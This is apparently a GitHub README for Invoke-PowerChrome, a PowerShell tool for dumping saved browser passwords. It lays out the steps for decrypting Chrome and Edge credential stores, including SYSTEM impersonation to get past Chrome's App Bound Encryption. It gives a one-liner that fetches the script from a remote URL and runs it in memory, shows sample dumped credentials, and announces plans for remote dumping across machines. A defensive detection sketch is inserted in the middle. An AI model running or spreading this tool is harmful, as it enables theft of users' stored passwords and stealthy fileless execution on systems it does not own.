
0xsudomode/invoke-powerchrome

 
 


Invoke-PowerChrome

A PowerShell script for decrypting Chromium-based browser passwords, supporting both v10 (DPAPI user) and Google Chrome v20 (App Bound Encryption) encrypted blobs.

The script dynamically interacts with Windows cryptographic APIs to decrypt passwords without external dependencies and can be executed in memory.

This code is based on the following PoC: https://github.com/runassu/chrome_v20_decryption


Microsoft Edge / Chromium v10 Blobs

Requirements

  • No special privileges required
  • Runs in current user context

Process Overview

  • Read Local State file → get os_crypt.encrypted_key.
  • Strip DPAPI prefix → DPAPI Unprotect (CurrentUser) → derive master key.
  • AES-GCM decrypt password blobs in Login Data with the master key.

Google Chrome v20 blobs (App Bound Encryption)

Requirements

  • Administrative rights (to impersonate SYSTEM)

Process Overview

  • Read Local State file → get os_crypt.app_bound_encrypted_key
  • Impersonate SYSTEM → DPAPI Unprotect (SYSTEM) → Rev2self → DPAPI Unprotect (CurrentUser).
  • Parse flag-3 blob → extract encrypted_aes_key, iv, ciphertext, tag.
  • Open NCrypt key "Google Chromekey1" → Decrypt → XOR with fixed 32-byte hardcoded key from elevation_service.exe → derive aes_key.
  • AES-GCM decrypt (iv, ciphertext, tag) with aes_key → get app_bound_key.
  • AES-GCM decrypt password blobs in Login Data with the app_bound_key.
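Both process overviews begin with a non-browser process reading Local State and Login Data, and a script loaded in memory is still recorded when PowerShell script block logging is enabled. The following detection sketch is an added example, not part of this project's code: it triages exported Windows events (4663 object access, 4104 script block) for those two signals. The event records are constructed, and the allowlist of expected readers is an assumption.

```python
import ntpath

# Strings taken from this README's process overviews and usage section.
SCRIPT_MARKERS = ("app_bound_encrypted_key", "os_crypt", "Google Chromekey1",
                  "Invoke-PowerChrome")
CREDENTIAL_FILES = ("login data", "local state")
# Assumption: only the browsers' own binaries should open these files.
EXPECTED_READERS = {"chrome.exe", "msedge.exe"}


def check_event(event):
    """Return a finding string for a suspicious event, or None."""
    if event["EventID"] == 4663:  # object access; needs a SACL on the files
        path = event["ObjectName"].lower()
        reader = ntpath.basename(event["ProcessName"]).lower()
        if ("\\user data\\" in path
                and ntpath.basename(path) in CREDENTIAL_FILES
                and reader not in EXPECTED_READERS):
            return f"{reader} opened {ntpath.basename(path)}"
    elif event["EventID"] == 4104:  # PowerShell script block logging
        text = event["ScriptBlockText"].lower()
        hits = [m for m in SCRIPT_MARKERS if m.lower() in text]
        if hits:
            return "script block references " + ", ".join(hits)
    return None


def triage(events):
    """Return (computer, finding) pairs for every event that matches a rule."""
    return [(e["Computer"], f) for e in events if (f := check_event(e))]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 4663, "Computer": "WS01",
     "ObjectName": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data",
     "ProcessName": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
    {"EventID": 4663, "Computer": "WS02",
     "ObjectName": r"C:\Users\bob\AppData\Local\Microsoft\Edge\User Data\Local State",
     "ProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"EventID": 4104, "Computer": "WS02",
     "ScriptBlockText": "Invoke-PowerChrome -Browser Chrome -HideBanner"},
    {"EventID": 4104, "Computer": "WS03", "ScriptBlockText": "Get-ChildItem C:\\Temp"},
]

if __name__ == "__main__":
    for host, finding in triage(SAMPLE_EVENTS):
        print(host, finding)
```

The file-access rule is the more durable of the two, since function and marker names in a script can be changed while the files that must be read cannot.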

Usage

Load into memory

IRM 'https://raw.githubusercontent.com/The-Viper-One/Invoke-PowerChrome/refs/heads/main/Invoke-PowerChrome.ps1' | IEX

Example Commands

Invoke-PowerChrome -Browser Chrome
Invoke-PowerChrome -Browser Chromium
Invoke-PowerChrome -Browser Edge

# Hide Banner
Invoke-PowerChrome -Browser Chrome -HideBanner

# Verbose
Invoke-PowerChrome -Browser Chrome -Verbose

Example Output

    ____                          ________
   / __ \______      _____  _____/ ____/ /_  _________  ____ ___  ___
  / /_/ / __ \ | /| / / _ \/ ___/ /   / __ \/ ___/ __ \/ __ `__ \/ _ \
 / ____/ /_/ / |/ |/ /  __/ /  / /___/ / / / /  / /_/ / / / / / /  __/
/_/    \____/|__/|__/\___/_/   \____/_/ /_/_/   \____/_/ /_/ /_/\___/

Github: https://github.com/The-Viper-One/


[*] Microsoft Edge
[+] Decrypted Credentials

Target                 Username         Password
------                 --------         --------
https://tryhackme.com/ test@email.com   Password123-1!
https://tryhackme.com/ test_2@email.com L0ngAsFKP@ssW0rd

[*] Google Chrome
[+] Decrypted Credentials

Target                 Username                  Password
------                 --------                  --------
https://tryhackme.com/ test@Chrome_Browser.com   G0oGl3Chr0m3
https://tryhackme.com/ test_2@Chrome_Browser.com letmein

Future Work

Future releases will add the following:

  • Cookie decryption
  • Decryption of profiles other than "default"
  • Additional Chromium-based browser support

Integration with PsMapExec

This codebase will be merged into PsMapExec to support remote dumping of Chromium-based passwords. It will also integrate with SessionExec to leverage active user sessions and decrypt each user’s Chromium credentials.

References
